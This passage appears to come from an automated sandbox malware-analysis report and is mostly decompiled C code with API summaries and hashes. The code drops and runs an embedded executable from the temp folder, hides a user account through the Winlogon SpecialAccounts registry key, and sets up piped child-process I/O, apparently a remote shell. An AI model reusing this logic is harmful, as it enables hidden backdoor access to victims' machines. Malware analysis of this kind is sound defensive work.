                                      				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                      				_v72.cbSize = 0x3c;
                                      				_v72.lpFile =  &_v1096;
                                      				_v72.fMask = 0x40;
                                      				asm("xorps xmm0, xmm0");
                                      				_v72.lpParameters =  &_v3144;
                                      				asm("movlpd [ebp-0x20], xmm0");
                                      				asm("movlpd [ebp-0x18], xmm0");
                                      				asm("movlpd [ebp-0x10], xmm0");
                                      				_v72.hwnd = 0;
                                      				_v72.lpVerb = 0;
                                      				_v72.lpDirectory = 0;
                                      				_v72.nShow = 0;
                                      				_v72.hInstApp = 0;
                                      				return ShellExecuteExA( &_v72);
                                      			}
















                                      0x004106e2
                                      0x004106e3
                                      0x004106e4
                                      0x004106ea
                                      0x004106f8
                                      0x004106f9
                                      0x004106fb
                                      0x004106fd
                                      0x00410703
                                      0x00410714
                                      0x0041071c
                                      0x00410731
                                      0x00410735
                                      0x00410746
                                      0x00410749
                                      0x00410760
                                      0x0041076f
                                      0x00410785
                                      0x00410799
                                      0x004107a7
                                      0x004107b5
                                      0x004107d7
                                      0x004107e2
                                      0x004107e9
                                      0x004107fc
                                      0x00410819
                                      0x00410825
                                      0x0041082c
                                      0x00410838
                                      0x0041083f
                                      0x00410842
                                      0x00410848
                                      0x0041084e
                                      0x00410853
                                      0x00410858
                                      0x0041085b
                                      0x0041085e
                                      0x00410861
                                      0x00410864
                                      0x00410871

                                      APIs
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      • FindResourceW.KERNEL32(00000000,00000067,WM_FIND,00000000), ref: 0041072B
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00410735
                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 0041073F
                                      • LockResource.KERNEL32(00000000), ref: 00410749
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00410785
                                      • lstrcatA.KERNEL32(?,find.exe), ref: 00410799
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 004107A7
                                      • lstrcatA.KERNEL32(?,find.db), ref: 004107B5
                                      • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 004107D0
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004107E2
                                      • CloseHandle.KERNEL32(00000000), ref: 004107E9
                                      • wsprintfA.USER32 ref: 00410819
                                      • ShellExecuteExA.SHELL32(0000003C), ref: 00410867
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                      • String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
                                      • API String ID: 2851928664-3107137372
                                      • Opcode ID: 68ef4856930893ecc8bb8d035c63973616b061e0d02d0fa7959df2e9ec38db0a
                                      • Instruction ID: e1574f1f83d9bde2f99974769469830fce29d3d25454b2289c7f69e45333d6b7
                                      • Opcode Fuzzy Hash: 68ef4856930893ecc8bb8d035c63973616b061e0d02d0fa7959df2e9ec38db0a
                                      • Instruction Fuzzy Hash: 22414AB1900219BBDB10DFA1DD85FDEBBBCEF89304F10416AF609E2151DAB45A458BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E004106EC(void* __ecx, void* __eflags, long _a4) {
                                      				intOrPtr* _v8;
                                      				long _v12;
                                      				struct _SHELLEXECUTEINFOA _v72;
                                      				char _v1096;
                                      				char _v2120;
                                      				char _v3144;
                                      				void* _t37;
                                      				void* _t39;
                                      				struct HRSRC__* _t80;
                                      				void* _t83;
                                      
                                      				_t75 =  *_a4;
                                      				_t67 = __ecx + 4;
                                      				_v8 = __ecx + 4;
                                      				E004031FD(_t67, E0040F56D( &_a4,  *_a4 + 4,  *_t75));
                                      				E004058FB(_a4);
                                      				_t80 = FindResourceW(0, 0x67, L"WM_FIND");
                                      				_t37 = LoadResource(0, _t80);
                                      				_a4 = SizeofResource(0, _t80);
                                      				_t39 = LockResource(_t37);
                                      				E00401052( &_v1096, 0, 0x400);
                                      				E00401052( &_v2120, 0, 0x400);
                                      				GetTempPathA(0x400,  &_v1096);
                                      				lstrcatA( &_v1096, "find.exe");
                                      				GetTempPathA(0x400,  &_v2120);
                                      				lstrcatA( &_v2120, "find.db");
                                      				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                      				WriteFile(_t83, _t39, _a4,  &_v12, 0);
                                      				CloseHandle(_t83);
                                      				E00401052( &_v3144, 0, 0x400);
                                      				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                      				_v72.cbSize = 0x3c;
                                      				_v72.lpFile =  &_v1096;
                                      				_v72.fMask = 0x40;
                                      				asm("xorps xmm0, xmm0");
                                      				_v72.lpParameters =  &_v3144;
                                      				asm("movlpd [ebp-0x20], xmm0");
                                      				asm("movlpd [ebp-0x18], xmm0");
                                      				asm("movlpd [ebp-0x10], xmm0");
                                      				_v72.hwnd = 0;
                                      				_v72.lpVerb = 0;
                                      				_v72.lpDirectory = 0;
                                      				_v72.nShow = 0;
                                      				_v72.hInstApp = 0;
                                      				return ShellExecuteExA( &_v72);
                                      			}













                                      0x004106fb
                                      0x004106fd
                                      0x00410703
                                      0x00410714
                                      0x0041071c
                                      0x00410731
                                      0x00410735
                                      0x00410746
                                      0x00410749
                                      0x00410760
                                      0x0041076f
                                      0x00410785
                                      0x00410799
                                      0x004107a7
                                      0x004107b5
                                      0x004107d7
                                      0x004107e2
                                      0x004107e9
                                      0x004107fc
                                      0x00410819
                                      0x00410825
                                      0x0041082c
                                      0x00410838
                                      0x0041083f
                                      0x00410842
                                      0x00410848
                                      0x0041084e
                                      0x00410853
                                      0x00410858
                                      0x0041085b
                                      0x0041085e
                                      0x00410861
                                      0x00410864
                                      0x00410871

                                      APIs
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      • FindResourceW.KERNEL32(00000000,00000067,WM_FIND,00000000), ref: 0041072B
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00410735
                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 0041073F
                                      • LockResource.KERNEL32(00000000), ref: 00410749
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00410785
                                      • lstrcatA.KERNEL32(?,find.exe), ref: 00410799
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 004107A7
                                      • lstrcatA.KERNEL32(?,find.db), ref: 004107B5
                                      • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 004107D0
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004107E2
                                      • CloseHandle.KERNEL32(00000000), ref: 004107E9
                                      • wsprintfA.USER32 ref: 00410819
                                      • ShellExecuteExA.SHELL32(0000003C), ref: 00410867
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                      • String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
                                      • API String ID: 2851928664-3107137372
                                      • Opcode ID: 9eb1e37cb9858bab341310001c5df4c3ab4ed1bb1bc9db4cade85268520256ef
                                      • Instruction ID: 6e1240cbf3f4a79992a8638cb1fd4ac0d6d497e1373cd80395e89e7c5db35027
                                      • Opcode Fuzzy Hash: 9eb1e37cb9858bab341310001c5df4c3ab4ed1bb1bc9db4cade85268520256ef
                                      • Instruction Fuzzy Hash: C5414AB1900219BBDB10DFA1DD85FDEBBBCEF89304F104166F609E2151DAB49A418BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040C442(void* __edx, char _a4, char _a8) {
                                      				void* _v12;
                                      				char _v16;
                                      				int _v20;
                                      				char _v36;
                                      				void _v44;
                                      				void* _t51;
                                      				int _t56;
                                      				int _t70;
                                      				void* _t104;
                                      				signed int _t115;
                                      				void* _t161;
                                      				void* _t162;
                                      				void* _t163;
                                      				int _t172;
                                      
                                      				_t161 = __edx;
                                      				InitializeCriticalSection( &_v44);
                                      				_t115 = 6;
                                      				DeleteCriticalSection(memcpy(0x417cc8,  &_v44, _t115 << 2));
                                      				EnterCriticalSection(0x417cc8);
                                      				_t167 = _a4;
                                      				_t111 = _a8;
                                      				 *0x417d28 = _a4;
                                      				 *0x417d1c = 0x416cd0;
                                      				 *0x417d18 = _a8;
                                      				if(E0040BF64(_t161) == 0) {
                                      					_t51 = E0040D279();
                                      					__eflags = _t51 - 6;
                                      					if(_t51 < 6) {
                                      						L14:
                                      						E00404A3D(_t167, E004046DA( &_v36, 2, 0x417d20, 0x417d24));
                                      						E004046B7( &_v36);
                                      						LeaveCriticalSection(0x417cc8);
                                      						__eflags = 0;
                                      						return 0;
                                      					}
                                      					_t56 = E0040D22A();
                                      					__eflags = _t56;
                                      					if(_t56 != 0) {
                                      						goto L14;
                                      					}
                                      					__eflags = E0040D724() - 1;
                                      					if(__eflags == 0) {
                                      						_t162 = 8;
                                      						E004031FD(0x417d20, E0040326D( &_a4, _t162, __eflags));
                                      						E004058FB(_a4);
                                      						_t163 = 8;
                                      						E004031FD(0x417d24, E0040326D( &_a4, _t163, __eflags));
                                      						E004058FB(_a4);
                                      						_t172 = 0;
                                      						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
                                      						_v16 = 0;
                                      						RegSetValueExW(_v12,  *0x417d20, 0, 4,  &_v16, 4);
                                      						RegCloseKey(_v12);
                                      						_t70 = E0040B55D(0x417d20, 0x417d24);
                                      						__eflags = _t70;
                                      						if(_t70 != 0) {
                                      							E0040EF5F(_a8, _t163, E004033AB( &_a4, L"rudp"), 0x417d20);
                                      							E004058FB(_a4);
                                      							E0040EF5F(_a8, _t163, E004033AB( &_a8, L"rpdp"), 0x417d24);
                                      							E004058FB(_a8);
                                      							E00401E8E(0x417ce0, E0040C340, 0x417cc8);
                                      							LeaveCriticalSection(0x417cc8);
                                      							return 1;
                                      						}
                                      						E00404A3D(_t167, E004046DA( &_v36, 9, 0x417d20, 0x417d24));
                                      						E004046B7( &_v36);
                                      						L12:
                                      						LeaveCriticalSection(0x417cc8);
                                      						return _t172;
                                      					}
                                      					E00404A3D(_t167, E004046DA( &_v36, 1, 0x417d20, 0x417d24));
                                      					E004046B7( &_v36);
                                      					_t172 = 0;
                                      					goto L12;
                                      				}
                                      				E004031FD(0x417d20, E0040EF92(_t111, _t161,  &_a8, E004033AB( &_a4, L"rudp")));
                                      				E004058FB(_a8);
                                      				_a8 = 0;
                                      				E004058FB(_a4);
                                      				E004031FD(0x417d24, E0040EF92(_t111, _t161,  &_a8, E004033AB( &_a4, L"rpdp")));
                                      				E004058FB(_a8);
                                      				_a8 = 0;
                                      				E004058FB(_a4);
                                      				if(E00403027(0x417d20) != 0 || E00403027(0x417d24) != 0) {
                                      					E00404A3D(_t167, E004046DA( &_v36, 8, 0x417d20, 0x417d24));
                                      					E004046B7( &_v36);
                                      				} else {
                                      					_t104 = E004033AB( &_a4, 0x412428);
                                      					E00404A3D(_t167, E004046DA( &_v36, 8, E004033AB( &_a8, 0x412428), _t104));
                                      					E004046B7( &_v36);
                                      					E004058FB(_a8);
                                      					_a8 = 0;
                                      					E004058FB(_a4);
                                      				}
                                      				_t172 = 1;
                                      				goto L12;
                                      			}

















                                      0x0040c442
                                      0x0040c44f
                                      0x0040c457
                                      0x0040c466
                                      0x0040c472
                                      0x0040c478
                                      0x0040c47b
                                      0x0040c47e
                                      0x0040c484
                                      0x0040c48e
                                      0x0040c49b
                                      0x0040c59c
                                      0x0040c5a1
                                      0x0040c5a4
                                      0x0040c717
                                      0x0040c72e
                                      0x0040c736
                                      0x0040c73c
                                      0x0040c742
                                      0x00000000
                                      0x0040c742
                                      0x0040c5aa
                                      0x0040c5af
                                      0x0040c5b1
                                      0x00000000
                                      0x00000000
                                      0x0040c5bc
                                      0x0040c5bf
                                      0x0040c5ee
                                      0x0040c5fd
                                      0x0040c605
                                      0x0040c60c
                                      0x0040c61d
                                      0x0040c625
                                      0x0040c62d
                                      0x0040c647
                                      0x0040c652
                                      0x0040c662
                                      0x0040c66b
                                      0x0040c677
                                      0x0040c67c
                                      0x0040c67e
                                      0x0040c6cb
                                      0x0040c6d3
                                      0x0040c6e9
                                      0x0040c6f1
                                      0x0040c706
                                      0x0040c70c
                                      0x00000000
                                      0x0040c714
                                      0x0040c693
                                      0x0040c69b
                                      0x0040c6a0
                                      0x0040c6a6
                                      0x00000000
                                      0x0040c6ac
                                      0x0040c5d8
                                      0x0040c5e0
                                      0x0040c5e5
                                      0x00000000
                                      0x0040c5e5
                                      0x0040c4c0
                                      0x0040c4c8
                                      0x0040c4d2
                                      0x0040c4d5
                                      0x0040c4fb
                                      0x0040c503
                                      0x0040c50b
                                      0x0040c50e
                                      0x0040c51f
                                      0x0040c587
                                      0x0040c58f
                                      0x0040c52c
                                      0x0040c535
                                      0x0040c552
                                      0x0040c55a
                                      0x0040c562
                                      0x0040c56a
                                      0x0040c56d
                                      0x0040c56d
                                      0x0040c596
                                      0x00000000

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040C44F
                                      • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040C466
                                      • EnterCriticalSection.KERNEL32(00417CC8,?,?), ref: 0040C472
                                        • Part of subcall function 0040BF64: RegOpenKeyExW.ADVAPI32 ref: 0040BF96
                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?), ref: 0040C647
                                      • RegSetValueExW.ADVAPI32 ref: 0040C662
                                      • RegCloseKey.ADVAPI32(?), ref: 0040C66B
                                      • LeaveCriticalSection.KERNEL32(00417CC8,00000000,00417D20,00417D24,?,?), ref: 0040C6A6
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E
                                      • LeaveCriticalSection.KERNEL32(00417CC8,00000000,rpdp,00417D24,00000000,rudp,00417D20,00417D20,00417D24,?,?), ref: 0040C70C
                                      • LeaveCriticalSection.KERNEL32(00417CC8,00000000,?,?), ref: 0040C73C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                      • API String ID: 2046459734-177601018
                                      • Opcode ID: b52cdbca299196601e6eb064cad596b6f475cf98fcca56eec00eaf2c038a896e
                                      • Instruction ID: 134793a7356a7ec53501799a6182d928eec22be218d892ca06c187ad0c48d641
                                      • Opcode Fuzzy Hash: b52cdbca299196601e6eb064cad596b6f475cf98fcca56eec00eaf2c038a896e
                                      • Instruction Fuzzy Hash: 5E716F71600108BADB04FF61DC969EE3B69EF48359B00843BBA06B62D1DF7C5A46CB5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040CAF0(void* __eflags, char _a4) {
                                      				void* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				struct _SECURITY_ATTRIBUTES _v36;
                                      				void* _t54;
                                      				void* _t61;
                                      				void* _t64;
                                      				int _t66;
                                      				void* _t76;
                                      				int _t94;
                                      				void* _t95;
                                      
                                      				E0040CA7E(0x416578);
                                      				_v12 = _v12 & 0x00000000;
                                      				_v16 = _v16 & 0x00000000;
                                      				_v8 = _v8 & 0x00000000;
                                      				_t94 = 1;
                                      				_v20 = _v20 & 0x00000000;
                                      				_v24 = _v24 & 0x00000000;
                                      				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
                                      				_v36.nLength = 0xc;
                                      				_v36.bInheritHandle = 1;
                                      				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
                                      					L7:
                                      					E0040CC81( &_v12);
                                      					E0040CC81( &_v8);
                                      					E0040CC81( &_v16);
                                      					E0040CC81( &_v20);
                                      					E0040CC81( &_v24);
                                      					E0040CA7E(0x416578);
                                      					_t94 = 0;
                                      				} else {
                                      					_t54 = GetCurrentProcess();
                                      					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
                                      						goto L7;
                                      					} else {
                                      						_t61 = GetCurrentProcess();
                                      						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x416580, 0, 0, 2) == 0) {
                                      							goto L7;
                                      						} else {
                                      							_t64 = GetCurrentProcess();
                                      							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x416584, 0, 0, 2);
                                      							_t101 = _t66;
                                      							if(_t66 == 0) {
                                      								goto L7;
                                      							} else {
                                      								E0040CC81( &_v12);
                                      								E0040CC81( &_v20);
                                      								E004033F3(_t95,  &_a4);
                                      								if(E0040C88E(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
                                      									goto L7;
                                      								} else {
                                      									E0040CC81( &_v8);
                                      									E0040CC81( &_v24);
                                      									E0040CC81( &_v16);
                                      									 *0x416588 = CreateEventA(0, 1, 0, 0);
                                      									_t76 = CreateThread(0, 0, E0040C927, 0x416578, 0, 0x416590);
                                      									 *0x41658c = _t76;
                                      									if(_t76 == 0) {
                                      										goto L7;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				E004058FB(_a4);
                                      				return _t94;
                                      			}
















                                      0x0040cafe
                                      0x0040cb03
                                      0x0040cb0a
                                      0x0040cb10
                                      0x0040cb14
                                      0x0040cb15
                                      0x0040cb19
                                      0x0040cb1d
                                      0x0040cb27
                                      0x0040cb32
                                      0x0040cb3e
                                      0x0040cc3c
                                      0x0040cc3f
                                      0x0040cc47
                                      0x0040cc4f
                                      0x0040cc57
                                      0x0040cc5f
                                      0x0040cc69
                                      0x0040cc6e
                                      0x0040cb44
                                      0x0040cb53
                                      0x0040cb66
                                      0x00000000
                                      0x0040cb88
                                      0x0040cb93
                                      0x0040cba0
                                      0x00000000
                                      0x0040cba6
                                      0x0040cbb1
                                      0x0040cbba
                                      0x0040cbbc
                                      0x0040cbbe
                                      0x00000000
                                      0x0040cbc0
                                      0x0040cbc3
                                      0x0040cbcb
                                      0x0040cbe0
                                      0x0040cbec
                                      0x00000000
                                      0x0040cbee
                                      0x0040cbf1
                                      0x0040cbf9
                                      0x0040cc01
                                      0x0040cc28
                                      0x0040cc2d
                                      0x0040cc33
                                      0x0040cc3a
                                      0x00000000
                                      0x00000000
                                      0x0040cc3a
                                      0x0040cbec
                                      0x0040cbbe
                                      0x0040cba0
                                      0x0040cb66
                                      0x0040cc73
                                      0x0040cc7e

                                      APIs
                                        • Part of subcall function 0040CA7E: GetCurrentThreadId.KERNEL32(?,00000000,00402904,00000000,exit,00000000,start), ref: 0040CA8A
                                        • Part of subcall function 0040CA7E: SetEvent.KERNEL32(00000000), ref: 0040CA9E
                                        • Part of subcall function 0040CA7E: WaitForSingleObject.KERNEL32(0041658C,00001388), ref: 0040CAAB
                                        • Part of subcall function 0040CA7E: TerminateThread.KERNEL32(0041658C,000000FE), ref: 0040CABC
                                      • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0040CB36
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0040CB53
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040CB59
                                      • DuplicateHandle.KERNEL32 ref: 0040CB62
                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0040CB7A
                                      • GetCurrentProcess.KERNEL32(00416580,00000000,00000000,00000002,?,00000000), ref: 0040CB93
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040CB99
                                      • DuplicateHandle.KERNEL32 ref: 0040CB9C
                                      • GetCurrentProcess.KERNEL32(00416584,00000000,00000000,00000002,?,00000000), ref: 0040CBB1
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040CBB7
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040CC0D
                                      • CreateThread.KERNEL32(00000000,00000000,0040C927,00416578,00000000,00416590), ref: 0040CC2D
                                      • DuplicateHandle.KERNEL32 ref: 0040CBBA
                                        • Part of subcall function 0040CC81: CloseHandle.KERNEL32(00416588), ref: 0040CC8B
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 0040C88E: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040C8E0
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                      • String ID:
                                      • API String ID: 337272696-0
                                      • Opcode ID: 72700d1d587d8365f7efa78f55491a447b89c2c899ef13fa7bd130b36919d69e
                                      • Instruction ID: cfbdd5b7a17737b0ed7d5eecf7ec0e2bbc46d3a328e85f31f6445c0037f4dca5
                                      • Opcode Fuzzy Hash: 72700d1d587d8365f7efa78f55491a447b89c2c899ef13fa7bd130b36919d69e
                                      • Instruction Fuzzy Hash: 22415F71A40209FAEB10EBA1DD96FEF7B78EF14745F10423AB504B20D1DB789A05DA68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040B6D2(struct _QUERY_SERVICE_CONFIG* _a4) {
                                      				int _v8;
                                      				void* __ecx;
                                      				void* _t10;
                                      				void* _t26;
                                      				struct _QUERY_SERVICE_CONFIG* _t34;
                                      				void* _t37;
                                      
                                      				_v8 = 0;
                                      				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t37 = _t10;
                                      				if(_t37 != 0) {
                                      					_t26 = OpenServiceW(_t37,  *_a4, 1);
                                      					if(_t26 != 0) {
                                      						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
                                      							_t34 = E00405955(_v8);
                                      							_a4 = _t34;
                                      							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
                                      								CloseServiceHandle(_t37);
                                      								CloseServiceHandle(_t26);
                                      								E004010C1(_a4);
                                      								_t10 =  *(_t34 + 4);
                                      							} else {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							L6:
                                      							CloseServiceHandle(_t37);
                                      							CloseServiceHandle(_t26);
                                      							goto L7;
                                      						}
                                      					} else {
                                      						CloseServiceHandle(_t37);
                                      						L7:
                                      						_t10 = 0;
                                      					}
                                      				}
                                      				return _t10;
                                      			}









                                      0x0040b6e2
                                      0x0040b6e5
                                      0x0040b6eb
                                      0x0040b6ef
                                      0x0040b704
                                      0x0040b708
                                      0x0040b722
                                      0x0040b737
                                      0x0040b740
                                      0x0040b74d
                                      0x0040b769
                                      0x0040b76c
                                      0x0040b771
                                      0x0040b777
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040b74f
                                      0x0040b74f
                                      0x0040b756
                                      0x0040b759
                                      0x00000000
                                      0x0040b759
                                      0x0040b70a
                                      0x0040b70b
                                      0x0040b75b
                                      0x0040b75b
                                      0x0040b75b
                                      0x0040b779
                                      0x0040b77d

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040B6E5
                                      • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040B6FE
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B70B
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040B71A
                                      • GetLastError.KERNEL32 ref: 0040B724
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040B745
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B756
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B759
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B769
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B76C
                                        • Part of subcall function 004010C1: GetProcessHeap.KERNEL32(00000000,00000000,004032DA,00000000,00000000,?,?,?,00000000), ref: 004010C7
                                        • Part of subcall function 004010C1: HeapFree.KERNEL32(00000000,?,?), ref: 004010CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                      • String ID: ServicesActive
                                      • API String ID: 1929760286-3071072050
                                      • Opcode ID: 443a1f3935aeb02ab1ccaa1c10e119e32b48cad48cedba6c2e9887a8f7b8281f
                                      • Instruction ID: 038347b86dbf485e1479e30cf8f14de8664463b01bc04e0eaa051b469d69834d
                                      • Opcode Fuzzy Hash: 443a1f3935aeb02ab1ccaa1c10e119e32b48cad48cedba6c2e9887a8f7b8281f
                                      • Instruction Fuzzy Hash: 76117F71600214FBD7209F62DD88D9B7F6DEB853907108136FA05E7250DBB49E10CBAC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E0040C017(struct _CRITICAL_SECTION* __ecx, void* __edx) {
                                      				char _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				signed int _v60;
                                      				char _v64;
                                      				char _v68;
                                      				intOrPtr _v76;
                                      				int _t75;
                                      				int _t76;
                                      				int _t79;
                                      				int _t80;
                                      				void* _t82;
                                      				void* _t83;
                                      				int _t84;
                                      				int _t86;
                                      				int _t87;
                                      				int _t93;
                                      				void* _t94;
                                      				int _t132;
                                      				void* _t142;
                                      				char* _t143;
                                      				signed int _t154;
                                      				char* _t184;
                                      				intOrPtr _t193;
                                      				char* _t196;
                                      				void* _t199;
                                      				struct _CRITICAL_SECTION* _t202;
                                      				signed int _t211;
                                      				signed int _t213;
                                      				void* _t215;
                                      
                                      				_t199 = __edx;
                                      				_t156 = __ecx;
                                      				_t215 = (_t213 & 0xfffffff8) - 0x34;
                                      				_t202 = __ecx;
                                      				_t154 = 0;
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v56 = 0;
                                      				EnterCriticalSection(__ecx);
                                      				if(E0040D780(_t156) == 1) {
                                      					_t156 =  &_v56;
                                      					E0040D39C( &_v56);
                                      				}
                                      				_t205 = _t202 + 0x38;
                                      				_t75 = PathFileExistsW( *(_t202 + 0x38));
                                      				_t217 = _t75;
                                      				if(_t75 != 0) {
                                      					L11:
                                      					_t206 = _t202 + 0x3c;
                                      					_t76 = PathFileExistsW( *(_t202 + 0x3c));
                                      					__eflags = _t76;
                                      					if(_t76 != 0) {
                                      						L17:
                                      						E0040BDF7(_t202, _t199);
                                      						E0040BDDE(_t202);
                                      						_t159 = _t202;
                                      						_t79 = E0040BBA0(_t202);
                                      						__eflags = _t79;
                                      						if(_t79 != 0) {
                                      							_t160 = _t202;
